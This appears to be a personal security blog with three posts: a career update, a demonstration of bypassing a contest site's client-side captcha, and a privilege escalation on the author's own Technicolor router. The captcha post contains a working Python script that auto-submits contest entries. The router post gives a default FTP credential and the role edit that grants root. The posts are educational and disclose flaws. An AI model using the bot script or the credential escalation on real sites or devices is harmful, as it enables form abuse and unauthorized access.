Back on track and some word of advice

Hello paranoids

You: What the hell happened to you?

You see, i typically say i am lazy, even though i am not (too much…don’t judge me). I keep doing my stuff, working out and learning as much as i can about security (stopping depresses me, not stopping drains me, decisions decisions). However, i have two major problems: lack of time management capabilities and an everlasting need to try/learn new stuff.

I like to write and teach, which explains why i started this blog. Yet, i like to know what i am talking about before i teach anything and i am never satisfied with the depth of my knowledge (call it low self-esteem). Since i have had nothing meaningful to write about, this blog has been quite empty.  Also, a lot has happened since my last post:

  • I finished my thesis (it was about protecting PaaS services against malicious administrators). I can finally call myself an engineer (bow before me minions!).
  • I am working for

fireeye-2-color

         as an Information Security Analyst (at Dublin’s SOC)

  • I moved from Portugal to Dublin

The first point is cool and stuff but, unfortunately (for me), not really valued by good IT companies. I may post about it later but, for now, let us focus on the FireEye thing.

If a fellow Portuguese is reading this post, he/she will probably relate when i say that Portugal (at time of writing) is ruled (in terms of IT employment) by consulting companies and security-related jobs are pretty bad. So, i would be basically working in boring projects, being exploited by consulting companies and complaining about all of this every single day. I searched a lot and sent my CV to many companies: FireEye, Facebook, Google, Amazon, PaloAlto, Fortinet, RSA, BT. In my country, i spammed every single telecommunications provider, bank and supermarket chain. Truth is: hardly any of these entities hire directly (they typically hire consulting companies which, in turn, hire people).

FireEye got me first and I was super excited when i got my first email from them. The whole recruiting process was smooth and handled by extremely nice and professional people (expectations met). At that time, i was a bit slightly sad because i wanted to go to the US (cliché, i know). Calisthenics gives me the freedom to workout outside but I knew Dublin’s weather was bad (confirmed!), which would probably mess up my mood and my willingness to workout. Still, i knew that Portugal was not the way to go for someone passionate about information security. So i did what i never thought i could do: accept the job offer and move to Dublin.

If you live in a country where the economy is plain bad, you are encouraged (pretty early) to leave it and go abroad, to look for companies and people that actually care about you, and can provide you with new and meaningful challenges. However, as an IT expat i must warn you:

“Leaving alone abroad is no easy task.”

This is my first experience (6 months on 15th August) abroad, which may explain some misconceptions i have and some mistakes i am making but, depending on the type of life you had back at home and your objectives, leaving your country may be worthwhile or a plain waste of time.  If you want to leave your home land just for the experience, and you want comfort and fun, then do not leave it with the objective of saving money, you will be disappointed. If you are on a tight budget and you left your country for money and CV purposes, then be prepared for restrictions: small house, cooking a lot and if you get a studio (as i did) be ready for some dish-washing madness. Leaving your home country require a lot of will power and sacrifice. Hope for the best but be prepared for the worst.

But, advice and complaints aside:

What am i up to now?

I have been through lots of phases in terms of learning: pentesting, networks, programming, forensics, etc. Without going into further detail, i can tell you my job requires heavy forensics. Finding evil baby!!!

I like lots of areas and i get bored easily. I used to jump from subject to subject and never got anything done. I have been reading Practical Malware Analysis for a few months and i have to tell you, i am quite happy with what i am learning so far. I have been encouraged by a fellow Portuguese friend to dive into reverse engineering, assembly and malware analysis. I have had experience with assembly in the past. However, i was very afraid that i needed to know lots of low level stuff. Bear in mind that i am just a grasshopper and i may be simplifying stuff. However, i find the book quite easy to follow (both theory and labs) and i have managed to stay focused on this subject so far: no more drifting away, and i am not even bored.

With this i conclude my post. I intend to address malware analysis and reverse engineering on future posts. Until then

Stay safe 😉

Client-side anti-bot mechanism #exerciseinfutility

Hello paranoids

Today, i bring a laughable case of input verification and anti-bot measures. Let us get straight to the point, shall we?

When checking an online contest , i stumbled across this (the form is from a Portuguese website and was on Portuguese as well):

Context form

Contest form

BI is an 8-digits string representing unequivocally a citizen (citizen ID of sorts). I marked the “8+9” operation with the mouse. I am pretty sure you can tell what is coming next:

80's captcha

80’s captcha

At first, this seemed like a pretty old school captcha. This raises two questions:

  1. Is the validation client-side?
  2. Is the value hardcoded on the served page?

Well, a hardcoded should mean a server-side verification but we never know. Once i digged on the source scripts, i found this:

bot2bootinput

Client-side verification scripts.

For those wondering which are the required fields, they are: name, email, BI, phone and place. As you can see only email and “hipster captcha” are checked. The others are checked for emptiness at most. Other fields sent are hidden and easily retrievable with a basic script. As for cookies, you get an ASP.NET_SessionId through the Set-Cookie header and other cookies which i assume to be related to statistics (e.g. __gads).

Now, the saddest part here for both attackers and for application owners is that the form seems to succeed always: with or without cookies, with or without mail. To make things worse, the end-user gets no confirmation email which means i cannot tell if my participation was accepted or nor (if my attack succeeded or not). I may be wrong but i assume once the form is submitted, any errors from the database are ignored and the end-user receives an accepted response. The other explanation is that the database fields are all strings and thus, there is no type checking (AHH HELL NA!). Still, all this data suffices to create an automated script. In order to make an automated tool more user-alike, i will retrieve the session cookie.

This python script should do the trick:

import http.client as httpc
import urllib.parse as urlparse

#Http
host = 'cannot_tell_you_the_host'
path='/destaques/body_passatempos.aspx?id=6910'
headers={'Host':'host,'User-Agent':'Mozilla/5.0 (X11; Linux i686; rv:41.0) Gecko/20100101 Firefox/41.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Encoding':'gzip, deflate','Connection':'keep-alive'}

#Form fields - should use DOM but i am lazy
formID='2396'
cookID='DESTAQUEFORM2396'
recipient=urlparse.quote_plus('passatemposcidade@host')
redirect=''
subject=urlparse.quote_plus('Bilhetes O último caçador de bruxas')
participation=0
contest_id=2396
name=urlparse.quote_plus('John doe')
name_sort='nome'
name_required=name_sort
mail=urlparse.quote_plus('jd@yahoo.com')
mail_sort='mail'
mail_required=mail_sort
bi=1234
bi_sort='bi'
bi_required=bi_sort
phone=1234
phone_sort='telefone'
phone_required=phone_sort
place=urlparse.quote_plus('Cinemas NOS COLOMBO (Lisboa)')
place_question=urlparse.quote_plus('Onde queres ver o filme?')
place_sort='r5'
place_required=place_sort

bot_warmup_connection = httpc.HTTPConnection(host,80)

bot_warmup_connection.request("GET",path,'',headers)
first_get_response = bot_warmup_connection.getresponse()
print(first_get_response.getheaders())

participation_body_temp='formID={0}&cookID={1}&recipient={2}&redirect={3}&subject={4}&participation={5}&passatempo_id={6}&nome={7}&sort={8}&required={9}&mail={10}&sort={11}&required={12}&bi={13}&sort={14}&required={15}&telefone={16}&sort={17}&required={18}&r5={19}&p5={20}&sort={21}&required={22}'

participation_body=participation_body_temp.format(formID,cookID,recipient,redirect,subject,participation,contest_id,name,name_sort,name_required,mail,mail_sort,mail_required,bi,bi_sort,bi_required,phone,phone_sort,phone_required,place,place_question,place_sort,place_required)

print(participation_body)
headers['Cookie'] = first_get_response.getheader('Set-Cookie').split(';')[0]

submit_path='/sendMail.asp'

bot_submit_connection = httpc.HTTPConnection(host,80)
bot_submit_connection.request("POST",submit_path,participation_body,headers)
submit_response = bot_submit_connection.getresponse()
response_body = submit_response.read()

if submit_response.status == 200:
	print("OK!")

This script suffers from some issues and limitations since the website does not give appropriate feedback on the success of the submission (e.g. mail, http error code,server side response), leaving the bot and even a non-malicious user clueless (it is an example of bad security and programming…oh well..). Adding automated generation of BIs and emails and you have enough juice to fill their entire database (or their .txt file, i can’t even tell anymore).

The saddest part there is that i have notified the website owners previously (this is not the first time they use such poor security mechanism) of this page and got no response and no changes. People tend to program oriented to the “just works!/simplicity over security” paradigm leaving security aside until they suffer the consequences of their poor decisions. What i have just presented here is not alarming (it is not a data breach of some sort). Yet, it is enough to fill their databases with garbage, leaving other legitimate contest participants out.

You think you so smart. What would you do?

Well, i am glad you asked. First, the captcha should be an image (it is tough or close to impossible to get characters from a properly made captcha) and second, it should be generated and verified by the server. What is the point in having the client generate and verify something to protect the application from malicious clients? There are plenty of libraries to create captchas for php, asp, etc. Since i do not know which ones are safer, i will not name any (hacked readers are unsatisfied readers :P).

Stay safe 😉

Technicolor TG784n v3 hidden dangers and privilige escalation (made simple)

If you are reading this post: congratulations!, you are reading my first post ever on a blog.

I am pretty sure we share (if you like security) some concerns regarding internet-connected devices in your house, specially those you can’t understand correctly (in my case smartphones and ISP devices). This post regards the latter since, even though i am not familiar with Technicolor routers, i am still familiar with routers. I wanted to answer the question:

What services do my router offer, specially to the outside world?

First, a little:

Background:

Some of the things i will say here are not rocket science and you most likely know them but i think it is still important to reiterate because this blog intends to take security solutions and concerns to everyone. The internet device you see on your house, which was put there by your Internet Service Provider (ISP) routes your traffic between your internal devices and, between them and the internet. You may have dozens of internet-connected devices in your house, with different (private) IP addresses but they are all mapped to a single public IP address given by your ISP to identify your network to the world. Such mapping is made using NAT+PAT (Network Address Translation + Port Address Translation). Since you are mapping multiple private addresses to a single public one,  you must distinguish packets from different internal devices based on ports. Network 101 is over! time to get to the interesting parts.

ISP routers offer multiple services to network users (e.g. DNS, FTP, HTTP management page, Telnet for router management). While i knew this before, i was curious to find out more services. These services are typically protected from outside accesses, i.e., only users using private addresses may access them, which makes sense. Yet, the services i wanted to find out more about were the external services, available on the public address of the router (you can have different services on different router addresses by playing with the firewall).

I started with the internal network. Nmap to the rescue:

nmap -p0- -A -T5 -v default_gateway

where:
-p0-: all ports from 0-65535
-A: aggressive/advanced mode which performs OS/services fingerprinting, traceroute
-T5: maximum speed (i am scanning the router in my own house)
-v: show verbose output:
-default_gateway: the router address your devices use to send traffic to networks other than your current (e.g. internet).

Nmap reported six open ports (services):

    • 21(FTP): to store files. Typically used by the media center capabilities of the router.
    • 23(Telnet): to allow router management. If you trust your family you may keep Telnet.
    • 53(DNS): used by your network devices for name resolution.
    • 80(HTTP): user-friendly/limited/buggy administration alternative.
    • 443 (SSL): Reported as remote management.
    • 1723(PPTP): VPN server i suppose.

The only service ringing my paranoid bells is 443 (SSL). Yet, it is seen internally so, i ignored it for the time being. I skipped to the true troublemaker: the external IP. I performed the same Nmap command but this time with my public address (check yours in whatismyipaddress.com). I also ran Nmap from a public server to rule out firewall restrictions and make the scan more realistic. Nmap reported an open port: 51005 but could not identify clearly what service was there:

CWMP server port open

CWMP server port open

So i tried to connect to that port using the browser and i received this:

HTTP response from 51005

HTTP response from 51005

I don’t know about you but i had to change my pants because this intel made me dirty them. So i searched the port and the router and found out that this service was working as a server for the CWMP – CPE (Customer-premises Equipment) WAN Management Protocol. Being an acronym inside an acronym made me fetch another fresh pair. I am far from being an expert on such remote management protocol but, both words sound suspicious, so i needed to stop that service but i could not find the option on the web interface (work smart not hard). Just out of curiosity i checked other addresses on the range of my operator and noticed that they were running the same service. The passwords are most likely the same for every router and i will dig deeper into that later.

So, i tried to telnet to my router with the same user/password as the one used on the web interface:Administrator:. Yes, the password is blank. Routers default administrator are widely known to be limited (coff…useless…coff coff). The services running on this router can be checked on: service system list (either directly or going through each menu service=>system=>list). As i expected, the service was not shown to me using the Administrator account (couldn’t access the system menu) which led me to search for the root password, debug password, privilege escalation but Google hadn’t the solution. Some people suggested going to the FTP server and get the the user.ini config, modify it and replace it but the Administrator user couldn’t even ls the current directory (WTF?). So, i found out about another user:password, upgrade:Th0ms0n!, which apparently had more privileges. I tried to use it on the Telnet server but it wasn’t enabled but i tried it on the FTP server and managed to get the user.ini:

I searched the user.ini  for Administrator and found this:

Users and roles relations

Users and roles relations

Sorry to blur the hashes. It is not that i don’t trust you but..i don’t. Through the web administration page source, i managed to find what was the hash2 (MD5, really? says my mom). I could not find the meaning of the other fields but the role key is interesting. So i changed the Administrator role to root, uploaded the new file and restarted the router. Once more, i FTPed to the router as Administrator but couldn’t even ls, bro! I checked the user.ini Administrator name and noticed that the role was once more Administrator…weird… I checked once more the files on the main FTP directory and found another interesting file: security.cfg with the following interesting entries prefixed with r (there were more):

Roles definition

Roles definition

Well, i guess i hit the culprit. I assumed the r’s meant roles which makes this some sort of hierarchy (genius!) where the Administrator is a weak/limited role. I also assumed that after the second role “;” there were the capabilities of the roles. SuperUser seems all juiced up since it inherits from root and has lots of any’s, so:

Setting Administrator with the same privileges as SuperUser

 I tried:

rAdministrator;root

in the hope of getting all privileges from root (no specification==default==full power) but i assume i must specify them. After this i could finally access the router services menu and turn off the CWMP service:

Enabled 51005 service

Enabled 51005 service

As you can see, there are two CWMPs(-C and -S or Client and Server respectively). This is because the operator may connect to the router CWMP-S and the router may contact an operator CWMP server to retrieve configurations. The client CWMP concerns me too since i am not sure if the operator may push different configurations leaving me once more out of the cool root group but i will worry about that later.

How do i turn off this service then?

The Technicolor router has (as expected) a similar interface to other more widely used routers (the notion of menus and submenus). “?” lists the available commands, when you type a command and enter you go to the menu of that command and if you want to go back just type “..” (prompt users will find this familiar). To disable the service type: service, then system and then modify. You will be asked for name, state, port, qoslabel, etc. Just put the name “CWMP-S” and “disabled” state.  For the other keep them empty (just press enter until you see a message):

:service system modify name=CWMP-S state=disabled

To finish, just type “saveall” and enter and wait to see the prompt again and you are ready to go! I re-scanned my public IP but the service was no longer available (one less thing to worry about).

Final considerations

This post was meant to address the more paranoid people. To be honest, i had never messed with this router before but after escalating the privileges i will now customize it to my needs (i.e. mess with the firewall and IDS). I am not implying with this post  that you should disable the remote management service, fearing that your ISP may connect to it. I am not even sure of the management capabilities of this service. I am more concerned with the possibility of having a malicious hacker bruteforcing my router or using a leaked password which i am pretty sure is the same as any other router for the same ISP. I did not mention but, you should always keep a backup of the modified files (i keep .save files on the FTP server). I may on next posts analyze the stored passwords to check if i can find the default service password. This post is huge as you may notice but it is my first and i wanted you to get to know my writing style and myself a little better.

Stay safe 😉